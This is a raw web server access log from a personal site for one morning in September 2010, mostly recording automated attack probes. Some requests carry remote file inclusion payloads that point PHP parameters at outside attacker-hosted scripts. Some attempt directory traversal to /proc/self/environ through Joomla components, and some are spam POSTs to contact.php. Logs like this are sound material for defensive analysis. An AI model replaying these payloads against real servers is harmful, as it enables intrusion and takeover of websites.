69.10.136.189 - - [02/Sep/2010:11:06:59 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:36 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:37 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:38 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:39 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:39 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:40 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:11:07:40 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:09:05 -0700] "GET /logs/access_090208.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:09:06 -0700] "GET /logs/access_090527.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:19 -0700] "GET /logs/access_100218.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:19 -0700] "GET /logs/access_100325.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:24 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 200 167701 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:26 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 200 68581 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:26 -0700] "GET /logs/access_100218.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:26 -0700] "GET /logs/access_100325.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:26 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 200 68580 "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:09:27 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 200 167701 "-" "Mozilla/5.0" "www.dmulk.com"
209.61.244.6 - - [02/Sep/2010:11:09:28 -0700] "GET /logs/access_100804.log/////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
209.61.244.6 - - [02/Sep/2010:11:09:32 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68601 "-" "libwww-perl/5.76" "www.dmulk.com"
209.61.244.6 - - [02/Sep/2010:11:09:34 -0700] "GET /logs/////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167703 "-" "libwww-perl/5.76" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:09:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:09:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:11:10:04 -0700] "POST /logs/access_080515.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:10:04 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:10:15 -0700] "GET /logs/access_100218.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:10:15 -0700] "GET /logs/access_100325.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:10:16 -0700] "GET /logs/access_100218.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.38.173.36 - - [02/Sep/2010:11:10:16 -0700] "GET /logs/access_100325.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/sk/image_galeri/f1905A3b___CIMG1357.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:11:12 -0700] "GET /logs/access_080306.log HTTP/1.0" 200 1787608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:12:50 -0700] "GET /logs/access_091104.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
64.157.4.42 - - [02/Sep/2010:11:12:52 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:12:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:12:52 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:13:02 -0700] "GET /logs/access_090508.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:13:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:13:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:13:04 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:14 -0700] "GET /logs/access_090508.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:13:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:15 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:18 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:13:51 -0700] "GET /logs/access_100524.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:13:51 -0700] "GET /logs/access_100524.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:14:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:14:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:14:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:15:03 -0700] "GET /logs/access_100212.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:15:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:15:04 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:11:15:04 -0700] "GET /logs/access_080709.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:15:07 -0700] "GET /logs/access_100212.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:15:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:15:09 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:15:10 -0700] "GET /logs/access_080709.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:15:26 -0700] "GET /logs/access_091104.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:15:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:15:31 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:15:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:16:55 -0700] "GET /logs/access_100212.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:16:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:16:57 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:17:02 -0700] "GET /logs/access_080709.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:17:22 -0700] "GET /logs/access_071221.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:17:24 -0700] "GET /logs/access_100706.log HTTP/1.0" 200 6454816 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:11:18:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:18:39 -0700] "GET /logs/access_080610.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:20:02 -0700] "POST /logs/access_080914.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:20:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:20:02 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:11:20:51 -0700] "GET /logs/access_090607.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:11:20:51 -0700] "GET /logs/access_090607.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:11:20:51 -0700] "GET /logs/access_090607.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:11:20:54 -0700] "POST /logs/access_090607.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:11:20:55 -0700] "GET /logs/access_090607.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:11:21:10 -0700] "GET ///appserv/main.php?appserv_root=http://www.ribarska.com/cgi-bin/article/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:11:21:10 -0700] "GET /logs////appserv/main.php?appserv_root=http://www.ribarska.com/cgi-bin/article/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:11:21:10 -0700] "GET /logs/access_090812.log////appserv/main.php?appserv_root=http://www.ribarska.com/cgi-bin/article/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.46.13.84 - - [02/Sep/2010:11:21:31 -0700] "GET /logs/access_080307.log HTTP/1.1" 200 1656075 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
208.115.111.242 - - [02/Sep/2010:11:21:37 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:21:54 -0700] "GET /logs/access_090508.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:21:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:11:21:57 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:22:20 -0700] "POST /logs/access_080914.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:22:20 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:11:22:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
81.169.133.109 - - [02/Sep/2010:11:22:40 -0700] "GET /logs/access_090506.log/?pg=http://cybernewbie.zoomshare.com/files/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.133.109 - - [02/Sep/2010:11:22:41 -0700] "GET /?pg=http://cybernewbie.zoomshare.com/files/ID-RFI.txt?? HTTP/1.1" 200 68537 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.133.109 - - [02/Sep/2010:11:22:45 -0700] "GET /logs/access_090506.log/?pg=http://cybernewbie.zoomshare.com/files/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.133.109 - - [02/Sep/2010:11:22:46 -0700] "GET /logs/?pg=http://cybernewbie.zoomshare.com/files/ID-RFI.txt?? HTTP/1.1" 200 167695 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.133.109 - - [02/Sep/2010:11:22:49 -0700] "GET /?pg=http://cybernewbie.zoomshare.com/files/ID-RFI.txt?? HTTP/1.1" 200 68536 "-" "libwww-perl/5.808" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:22:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
81.169.133.109 - - [02/Sep/2010:11:22:50 -0700] "GET /logs/?pg=http://cybernewbie.zoomshare.com/files/ID-RFI.txt?? HTTP/1.1" 200 167695 "-" "libwww-perl/5.808" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:22:52 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:22:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:23:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:23:37 -0700] "POST /logs/access_080219.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:11:23:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:11:23:42 -0700] "GET /megumi/minamigrad2k8/IMG_1711.CR2 HTTP/1.0" 200 9086464 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:11:24:53 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:11:24:55 -0700] "GET /logs/access_100620.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.0.81.185 - - [02/Sep/2010:11:24:58 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://127.0.0.1/r0x.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:11:25:22 -0700] "GET /logs/access_080103.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.73.227.30 - - [02/Sep/2010:11:26:54 -0700] "POST /logs/access_091104.log//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
217.73.227.30 - - [02/Sep/2010:11:26:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
217.73.227.30 - - [02/Sep/2010:11:26:54 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:27:01 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:27:01 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:27:05 -0700] "GET /logs/access_100102.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:27:39 -0700] "GET /logs/access_090305.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [02/Sep/2010:11:27:57 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
72.87.252.58 - - [02/Sep/2010:11:27:57 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/media-rss.php HTTP/1.1" 200 7897 "-" "Apple-PubSub/65.20" "dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:28:00 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:28:00 -0700] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:28:00 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:28:03 -0700] "GET /logs/access_100102.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:11:28:28 -0700] "GET /logs/access_090305.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.73.227.30 - - [02/Sep/2010:11:28:52 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
217.73.227.30 - - [02/Sep/2010:11:28:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
62.152.60.110 - - [02/Sep/2010:11:28:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
217.73.227.30 - - [02/Sep/2010:11:28:55 -0700] "POST /logs/access_100526.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
